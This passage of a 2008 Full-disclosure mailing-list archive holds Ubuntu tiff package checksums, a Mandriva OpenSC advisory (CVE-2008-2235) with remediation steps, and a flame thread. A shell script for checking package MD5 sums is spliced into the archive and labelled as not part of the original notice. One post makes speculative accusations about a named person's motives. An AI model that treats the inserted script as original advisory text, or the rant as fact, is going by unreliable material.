8e64e0f252f0cf1805a95503763a7ee7 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.3_i386.deb Size/MD5: 44496 
38356372e09eacc21c85147a64730863 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.3_i386.deb Size/MD5: 49028 0f209680ec3fe2d63b8f2ee1eb82d671 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.3_powerpc.deb Size/MD5: 239612 85752da1b75412f455964b6e330d9b9c http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.3_powerpc.deb Size/MD5: 287816 7dbabece275f8672edb8a23d55a7a473 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.3_powerpc.deb Size/MD5: 475776 4aa903c0a0ff484a56c5fe1704a4e727 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.3_powerpc.deb Size/MD5: 46734 bb81db39da467e2625c0d042d3a8cd28 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.3_powerpc.deb Size/MD5: 51374 a98d703c16b08432c5faba227b49a11c sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.3_sparc.deb Size/MD5: 208422 3403ad880d5a4928093e37077325b249 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.3_sparc.deb Size/MD5: 269832 9e31723f565218781859094e02157832 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.3_sparc.deb Size/MD5: 466524 60370fd4a11ed2ab9405d1d34ec89613 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.3_sparc.deb Size/MD5: 44444 d55f667802302d260a0e9fa818a84062 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.3_sparc.deb Size/MD5: 49580 8e9cf307f440d06e4fac7f8a0e72b575 Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-6ubuntu1.diff.gz Size/MD5: 17421 c27407897402d8784aaa78872df66084 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-6ubuntu1.dsc Size/MD5: 894 7f473766d9506c9cf8c9dc9fc301899a 
http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2.orig.tar.gz Size/MD5: 1333780 e6ec4ab957ef49d5aabc38b7a376910b amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-6ubuntu1_amd64.deb Size/MD5: 185580 b0e5244445e5b5842e15ede52b62a464 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-6ubuntu1_amd64.deb Size/MD5: 248558 f870334e57d6cf450c113b434ec7dc1f http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-6ubuntu1_amd64.deb Size/MD5: 491096 f082f77dec69c785f86c7da6a34e30bf http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-6ubuntu1_amd64.deb Size/MD5: 4948 2af2beb4111fec29a89f4fc5b345dd4d http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-6ubuntu1_amd64.deb Size/MD5: 10380 2ae539b37bfc0a4fdf0b4d1f79d71c01 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-6ubuntu1_i386.deb Size/MD5: 174706 06ddc26a9eb1f25e51a537f4d13d0cd7 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-6ubuntu1_i386.deb Size/MD5: 230880 1e263f73724556b229ce53da89f1bb6c http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-6ubuntu1_i386.deb Size/MD5: 483176 c204eee64ba32343630090710e886ce5 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-6ubuntu1_i386.deb Size/MD5: 4948 0583b395261bfc9e8971845183aa1370 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-6ubuntu1_i386.deb Size/MD5: 9870 afb43b9979860ab71d5b18f667a94234 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-6ubuntu1_powerpc.deb Size/MD5: 221280 67928c23965f4aad6dc9bd0904a5de3c http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-6ubuntu1_powerpc.deb Size/MD5: 255168 1ee1410c16e8878c1363714c7def2039 
http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-6ubuntu1_powerpc.deb Size/MD5: 496328 0efa9338a0a0a74593785ad710bff29c http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-6ubuntu1_powerpc.deb Size/MD5: 7444 5b6cf616b9371fb54ba7cd4d74671539 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-6ubuntu1_powerpc.deb Size/MD5: 13110 c3192321c2d2a212b4acb12a95958338 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-6ubuntu1_sparc.deb Size/MD5: 178680 5b6c97cd81cd4a6df4d4228ee48bb81e http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-6ubuntu1_sparc.deb Size/MD5: 236610 7e3286d3b39739a92c131d841fc6fa53 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-6ubuntu1_sparc.deb Size/MD5: 482248 8cf86b28cc0b967efaa635f28408e70e http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-6ubuntu1_sparc.deb Size/MD5: 4690 0d8ef4cc1149bc175e1b4cef56a533ac http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-6ubuntu1_sparc.deb Size/MD5: 10630 4fab06812752f458f00bbe408c4a5e51 Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-7ubuntu2.1.diff.gz Size/MD5: 17693 d8bfc71ab431317d9d7776e8904d41cb http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-7ubuntu2.1.dsc Size/MD5: 898 0e2bd83921a76666aaad9f0db1d2143f http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2.orig.tar.gz Size/MD5: 1333780 e6ec4ab957ef49d5aabc38b7a376910b amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu2.1_amd64.deb Size/MD5: 186046 5eca7cf38e7a627ac9ff35e05341c6a3 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu2.1_amd64.deb Size/MD5: 572732 6d8a9c1762acb37ac98637f5838677bd 
http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu2.1_amd64.deb Size/MD5: 167514 7c316c12186064ce36fa302eeb1a9d35 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu2.1_amd64.deb Size/MD5: 5030 36e2e41d1c74cba5f6226adcdb9635d4 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu2.1_amd64.deb Size/MD5: 10482 398ee14c1a54bf682843ab5b4d5a1ef2 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu2.1_i386.deb Size/MD5: 175032 35f9d040cf7bb70a3e0cdcaed891e8ea http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu2.1_i386.deb Size/MD5: 555062 b95d128052ee5deddde5512404116d93 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu2.1_i386.deb Size/MD5: 159682 6fecbcf423292c8afb087b717bc39733 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu2.1_i386.deb Size/MD5: 5036 58dea786bf7ab7b9f124864076f98bc7 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu2.1_i386.deb Size/MD5: 9950 4530d1926d2776a808b92451d241b40a lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu2.1_lpia.deb Size/MD5: 176688 c34dd42b7fb2c866a337cf0a831500dd http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu2.1_lpia.deb Size/MD5: 554916 5c89af650f71fa329f9b27c964e159b5 http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu2.1_lpia.deb Size/MD5: 159016 0e4f184a9264ecd2669df232f031f5bc http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu2.1_lpia.deb Size/MD5: 4886 c365fc0610f673b5b514190f52c9b2cd http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu2.1_lpia.deb Size/MD5: 9950 eedb7a284fd8ccfde7373719c5aa8e09 powerpc architecture (Apple Macintosh G3/G4/G5): 
http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu2.1_powerpc.deb Size/MD5: 221632 d54b58c8832e981a496517aee739e96d http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu2.1_powerpc.deb Size/MD5: 579494 ab32f5a3bdb94d98cfd5cec17fdbdb8b http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu2.1_powerpc.deb Size/MD5: 172920 6221864857865170ebc103e8e9ca2f1d http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu2.1_powerpc.deb Size/MD5: 7524 cce4cd11ab76e2a20fb23231128013d3 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu2.1_powerpc.deb Size/MD5: 13184 4417c793e3b787fb4925052e5628a487 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu2.1_sparc.deb Size/MD5: 179138 e056aaaf8281aeeec8e93bb4c646b11e http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu2.1_sparc.deb Size/MD5: 560334 28115f9f96039c2ea6a861be5418d2e4 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu2.1_sparc.deb Size/MD5: 159258 951e1ad2ff233ccf9a2357d6fd7c9d5a http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu2.1_sparc.deb Size/MD5: 4794 4da0d6d8b2c59f8d834f26893d056a77 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu2.1_sparc.deb Size/MD5: 10734 2430febfadfa3afef94890422229333a Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-7ubuntu3.1.diff.gz Size/MD5: 17739 3df53cb9be4eac8018114eca54eeddd0 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-7ubuntu3.1.dsc Size/MD5: 898 63c01af90b1a28f341cda765cb388af5 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2.orig.tar.gz Size/MD5: 1333780 e6ec4ab957ef49d5aabc38b7a376910b amd64 architecture (Athlon64, Opteron, EM64T Xeon): 
http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.1_amd64.deb Size/MD5: 186212 cb1aa7ea448c64d8a071db1e7103abde http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.1_amd64.deb Size/MD5: 570784 d42a106beb13b5fada52bb49b23348e0 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.1_amd64.deb Size/MD5: 130572 d92ef8e00a2c11a92ef2258c9ee34509 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.1_amd64.deb Size/MD5: 5076 505cb2e12de00a198f6043cfa5826f99 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.1_amd64.deb Size/MD5: 10500 3f4885e033e8b49ac0ace8a25033bd70 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.1_i386.deb Size/MD5: 175046 e1968da8535ff6051d1fd16fa515e77f http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.1_i386.deb Size/MD5: 552288 b22a3ffa9d2bd620aa7dcb5897ecb65d http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.1_i386.deb Size/MD5: 122264 c7e7c7b3d1f51471a67495a82c8c318c http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.1_i386.deb Size/MD5: 5038 c15e0e405b52dac9ae0ba43bf0bf2929 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.1_i386.deb Size/MD5: 9936 d295285a90e2f40f4c6be563f4feecf8 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.1_lpia.deb Size/MD5: 177130 feec0c26db46f966db003e73e04e42ca http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.1_lpia.deb Size/MD5: 554830 6833fbea686cd3780bd8e814aea90693 http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.1_lpia.deb Size/MD5: 123436 ba48f119c3690bafac6dc0914b080076 http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.1_lpia.deb Size/MD5: 4920 
74d243746774e0ad29fc9a5c888f88fa http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.1_lpia.deb Size/MD5: 9976 79dd38d3c74419e2f3af36599c3c0ed0 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.1_powerpc.deb Size/MD5: 223256 dc107cbd87d9106985537d6c275a0544 http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.1_powerpc.deb Size/MD5: 576802 7b70d820ee684cdccda2abb2f0803578 http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.1_powerpc.deb Size/MD5: 133868 bdfb766eeab2dfc1ee4e30c64464a581 http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.1_powerpc.deb Size/MD5: 7508 47e95d771f3e56e8d0edb098a227699d http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.1_powerpc.deb Size/MD5: 13288 df5e73b79db7688fbb097123a8893886 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.1_sparc.deb Size/MD5: 178648 76db5473a395f84e57f74882d4276032 http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.1_sparc.deb Size/MD5: 558200 2fa5edc2be0a83f0d8b5a872ad2852cc http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.1_sparc.deb Size/MD5: 122054 d54617bcf0f9ee0eb0593dc57f6cacaa http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.1_sparc.deb Size/MD5: 4802 bdc15c3e7f4658e9747e6092e7c118a5 http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.1_sparc.deb Size/MD5: 10696 0cbe55aa53a298214936bcd103370ad6 -------------- next part -------------- A non-text attachment was scrubbed... 
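The USN above publishes a Size/MD5 pair for every updated package so that a downloaded .deb can be checked before it is handed to dpkg. The script below is an added example, not part of the Ubuntu notice: it checks a file's byte length first (a truncated download fails cheaply without hashing) and then its MD5 digest, and a second function walks a list of "URL SIZE MD5" lines copied from an advisory. The list format, the example.invalid URLs and the demo files are constructed for illustration; GNU md5sum and wc are assumed.

```shell
#!/bin/sh
# Added example (not part of USN-639-1): verify downloaded packages against
# the Size/MD5 pairs printed in an advisory. Assumes GNU coreutils.

# verify_pkg FILE EXPECTED_SIZE EXPECTED_MD5
# Returns 0 when both size and digest match, 1 on a mismatch, 2 if unreadable.
verify_pkg() {
    file=$1; want_size=$2; want_md5=$3
    [ -r "$file" ] || { echo "unreadable: $file" >&2; return 2; }
    # Size first: a short or padded download is rejected before hashing.
    have_size=$(wc -c < "$file" | tr -d ' ')
    if [ "$have_size" != "$want_size" ]; then
        echo "SIZE MISMATCH $file: have $have_size want $want_size" >&2
        return 1
    fi
    # Compare digests in lowercase; advisories print lowercase hex.
    have_md5=$(md5sum "$file" | cut -d' ' -f1 | tr 'A-F' 'a-f')
    want_md5=$(printf '%s' "$want_md5" | tr 'A-F' 'a-f')
    if [ "$have_md5" != "$want_md5" ]; then
        echo "MD5 MISMATCH $file: have $have_md5 want $want_md5" >&2
        return 1
    fi
    echo "OK $file"
    return 0
}

# verify_list LISTFILE DIR
# LISTFILE holds one package per line as "URL SIZE MD5" (a constructed
# layout, condensed from the advisory's URL plus "Size/MD5:" line); each
# URL's basename is looked up in DIR. Returns 0 only if every entry passes.
verify_list() {
    list=$1; dir=$2; rc=0
    while read -r url size md5; do
        [ -n "$url" ] || continue
        verify_pkg "$dir/${url##*/}" "$size" "$md5" || rc=1
    done < "$list"
    return $rc
}

# Constructed demo (not advisory data): one intact file whose size and
# digest are known, and one file altered by a single byte. Returns 1,
# because the tampered file must fail.
demo() {
    d=$(mktemp -d)
    printf 'hello\n' > "$d/good.deb"
    printf 'hellO\n' > "$d/bad.deb"
    cat > "$d/list.txt" <<EOF
http://example.invalid/pool/good.deb 6 b1946ac92492d2347c6235b4d2611184
http://example.invalid/pool/bad.deb 6 b1946ac92492d2347c6235b4d2611184
EOF
    verify_list "$d/list.txt" "$d"
    rc=$?
    rm -rf "$d"
    return $rc
}
```

Run `demo` to see one OK line and one MD5 MISMATCH; for a real update, paste the advisory's URL and Size/MD5 values into the list file and point `verify_list` at the download directory. MD5 is what the notice publishes, so it is what the script checks; the integrity guarantee still comes from the signed Release files that apt verifies, which this check supplements rather than replaces.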
Name: not available Type: application/pgp-signature Size: 235 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080902/85310008/attachment.bin From security at mandriva.com Tue Sep 2 22:14:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Tue, 02 Sep 2008 15:14:00 -0600 Subject: [Full-disclosure] [ MDVSA-2008:183 ] opensc Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:183 http://www.mandriva.com/security/ _______________________________________________________________________ Package : opensc Date : September 2, 2008 Affected: 2007.1, 2008.0, 2008.1, Corporate 4.0 _______________________________________________________________________ Problem Description: Chaskiel M Grundman found that OpenSC would initialize smart cards with the Siemens CardOS M4 card operating system without proper access rights. This allowed everyone to change the card's PIN without first having the PIN or PUK, or the superuser's PIN or PUK (CVE-2008-2235). Please note that this issue cannot be used to discover the PIN on a card. If the PIN on a card is the same that was always there, it is unlikely that this vulnerability has been exploited. As well, this issue only affects smart cards and USB crypto tokens based on Siemens CardOS M4, and then only those devices that were initialized by OpenSC. Users of other smart cards or USB crypto tokens, or cards that were not initialized by OpenSC, are not affected. After applying the update, executing 'pkcs15-tool -T' will indicate whether the card is fine or vulnerable. If the card is vulnerable, the security settings need to be updated by executing 'pkcs15-tool -T -U'. The updated packages have been patched to prevent this issue. 
_______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2235 http://www.opensc-project.org/security.html _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.1: 77f7d7afda2b14397fd49eb9a40fe277 2007.1/i586/libopensc2-0.11.1-3.1mdv2007.1.i586.rpm 63ac5b681a7c32ff5fa5a19eaacd99c4 2007.1/i586/libopensc2-devel-0.11.1-3.1mdv2007.1.i586.rpm 70e9d0aa9fd4ee98e44acb640cca7334 2007.1/i586/mozilla-plugin-opensc-0.11.1-3.1mdv2007.1.i586.rpm 9990fd668eb0db7a2c3a067663935e6c 2007.1/i586/opensc-0.11.1-3.1mdv2007.1.i586.rpm 2ef9d3fd31d521b775f36480608f5494 2007.1/SRPMS/opensc-0.11.1-3.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 7ff78a629ff3fc4ebae26081445476b5 2007.1/x86_64/lib64opensc2-0.11.1-3.1mdv2007.1.x86_64.rpm d782522d41b4c9c3740d6d3917560a9f 2007.1/x86_64/lib64opensc2-devel-0.11.1-3.1mdv2007.1.x86_64.rpm 6e7cc1f3c8dd8485a182704d64a59c8b 2007.1/x86_64/mozilla-plugin-opensc-0.11.1-3.1mdv2007.1.x86_64.rpm 9337e42a69c15124642ed8f9756fd3c2 2007.1/x86_64/opensc-0.11.1-3.1mdv2007.1.x86_64.rpm 2ef9d3fd31d521b775f36480608f5494 2007.1/SRPMS/opensc-0.11.1-3.1mdv2007.1.src.rpm Mandriva Linux 2008.0: 4ce42db0e198b6ce9c9287594ee3fafd 2008.0/i586/libopensc2-0.11.3-2.1mdv2008.0.i586.rpm 70546abd01b00bab812fa6fea4ae4d16 2008.0/i586/libopensc-devel-0.11.3-2.1mdv2008.0.i586.rpm eba548b0a0547b26056233f5e8ca6adb 2008.0/i586/mozilla-plugin-opensc-0.11.3-2.1mdv2008.0.i586.rpm 7220fd9c1e95158f787cc8369826ec32 2008.0/i586/opensc-0.11.3-2.1mdv2008.0.i586.rpm ce97f832256d12037e51bafb9d70e5ef 2008.0/SRPMS/opensc-0.11.3-2.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 5378764b2b2d3cd848ac0ac542287b94 2008.0/x86_64/lib64opensc2-0.11.3-2.1mdv2008.0.x86_64.rpm a6dbaabff7dbd6cabc1202a334c663b2 2008.0/x86_64/lib64opensc-devel-0.11.3-2.1mdv2008.0.x86_64.rpm f3b2891c740068fa7f328690f8a53c0a 2008.0/x86_64/mozilla-plugin-opensc-0.11.3-2.1mdv2008.0.x86_64.rpm 
9ad409a7e667a9bc7c448ad207ce2afd 2008.0/x86_64/opensc-0.11.3-2.1mdv2008.0.x86_64.rpm ce97f832256d12037e51bafb9d70e5ef 2008.0/SRPMS/opensc-0.11.3-2.1mdv2008.0.src.rpm Mandriva Linux 2008.1: d2f1aecf3d76a0de1eb2314467e8039c 2008.1/i586/libopensc2-0.11.3-2.1mdv2008.1.i586.rpm 25cbd704341f975c3608b2415f73876a 2008.1/i586/libopensc-devel-0.11.3-2.1mdv2008.1.i586.rpm afeb1a983ab5dc9175abe9a3d4d2a043 2008.1/i586/mozilla-plugin-opensc-0.11.3-2.1mdv2008.1.i586.rpm 2e4f8fbf6baf274e24d0d68713c20bb0 2008.1/i586/opensc-0.11.3-2.1mdv2008.1.i586.rpm 53c7c0bc38eb3210137ce329559705cf 2008.1/SRPMS/opensc-0.11.3-2.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 78655b07b2736207d38d165f695f5e72 2008.1/x86_64/lib64opensc2-0.11.3-2.1mdv2008.1.x86_64.rpm 55f4a5fe2db33ec43b74353b92b01c6d 2008.1/x86_64/lib64opensc-devel-0.11.3-2.1mdv2008.1.x86_64.rpm 70d7f144e01d25f79b622484db2ef0bd 2008.1/x86_64/mozilla-plugin-opensc-0.11.3-2.1mdv2008.1.x86_64.rpm 807e29fd2d0560f65eff7fff274aa5e2 2008.1/x86_64/opensc-0.11.3-2.1mdv2008.1.x86_64.rpm 53c7c0bc38eb3210137ce329559705cf 2008.1/SRPMS/opensc-0.11.3-2.1mdv2008.1.src.rpm Corporate 4.0: f429cd809bb72592a21b37921ef4c3a0 corporate/4.0/i586/libopensc2-0.10.1-2.1.20060mlcs4.i586.rpm f91cc391ac3c574701b27d65ff2f14eb corporate/4.0/i586/libopensc2-devel-0.10.1-2.1.20060mlcs4.i586.rpm 7eb7c1057b2c47306482d0afc1e6e859 corporate/4.0/i586/mozilla-plugin-opensc-0.10.1-2.1.20060mlcs4.i586.rpm 4c69219b2f389fe050df05985deecb86 corporate/4.0/i586/opensc-0.10.1-2.1.20060mlcs4.i586.rpm 8830d7341d49f9da956a907e21e9a7a0 corporate/4.0/SRPMS/opensc-0.10.1-2.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: d92325b44dbf5deb8cfcd0cbf4f59012 corporate/4.0/x86_64/lib64opensc2-0.10.1-2.1.20060mlcs4.x86_64.rpm 2944306bed9b725e7c0bc196416de3c2 corporate/4.0/x86_64/lib64opensc2-devel-0.10.1-2.1.20060mlcs4.x86_64.rpm 424b680dbde7f548b731ecc4bf8021fc corporate/4.0/x86_64/mozilla-plugin-opensc-0.10.1-2.1.20060mlcs4.x86_64.rpm 70c9f7f70ca3e6635c80608189a220e0 
corporate/4.0/x86_64/opensc-0.10.1-2.1.20060mlcs4.x86_64.rpm 8830d7341d49f9da956a907e21e9a7a0 corporate/4.0/SRPMS/opensc-0.10.1-2.1.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIvX6MmqjQ0CJFipgRAoRWAKDJeFahAQ2AR414gjXP8O5e9kA+IQCdGkgV NXjfAeIK16LGCRR9/DHUvlU= =BPKk -----END PGP SIGNATURE----- From maillists at thelonecoder.com Tue Sep 2 22:07:55 2008 From: maillists at thelonecoder.com (Stephen Johnson) Date: Tue, 02 Sep 2008 14:07:55 -0700 Subject: [Full-disclosure] die In-Reply-To: <2d792fb20809021359u3f07b51cmc1d08cca144eb92f@mail.gmail.com> Message-ID: > Subject: Re: [Full-disclosure] die > > >> Who do you think you are, Gadi Evron or something? Don't tell people what to >> do. >> > > Who do you think you are, Gadi Evron or something? Don't tell people what to > do. Firefox has detected that the server is redirecting the request for this address in a way that will never complete -- Stephen Johnson c | eh The Lone Coder http://www.thelonecoder.com continuing the struggle against bad code http://www.fortheloveofgeeks.com I'm a geek and I'm OK! 
-- From xploitable at gmail.com Tue Sep 2 23:33:50 2008 From: xploitable at gmail.com (n3td3v) Date: Tue, 2 Sep 2008 23:33:50 +0100 Subject: [Full-disclosure] die In-Reply-To: References: <2d792fb20809021359u3f07b51cmc1d08cca144eb92f@mail.gmail.com> Message-ID: <4b6ee9310809021533i4c4b8d01l822b7520dcecc6e3@mail.gmail.com> On Tue, Sep 2, 2008 at 10:07 PM, Stephen Johnson wrote: > >> Subject: Re: [Full-disclosure] die >> >> >>> Who do you think you are, Gadi Evron or something? Don't tell people what to >>> do. >>> >> >> Who do you think you are, Gadi Evron or something? Don't tell people what to >> do. > > Firefox has detected that the server is redirecting the request for this > address in a way that will never complete > As long as Marcus Sachs doesn't make cyber security a national security agenda as the next administration is coming in. n3td3v saw that as a real threat to other countries' national security, specifically the United Kingdom, and as such I am on false flag alert. I'm convinced Marcus Sachs is hungry for power in Washington to do with cyber security. I think that's what was behind his senseless domain name reportage on the SANS Diary; he wanted to put cyber security in front of the next administration as it is coming in. He thought Gustav was gonna be a major cat 4, cat 5 hurricane and thought this is a perfect way to put cyber security in front of the next administration as they are coming in. Unfortunately for him his postings of domain names just turned into an alert board for the cyber criminals and helped them in knowing which domains not to use in cyber attacks. Plus the hurricane ended up making landfall on the Gulf Coast as a cat 2, cat 1 hurricane, so made his attempts to artificially ramp up cyber security as a national security agenda a damp squib. Although there is a flaw in his thinking, why make something a national security agenda when it isn't one? And that's what worries me. 
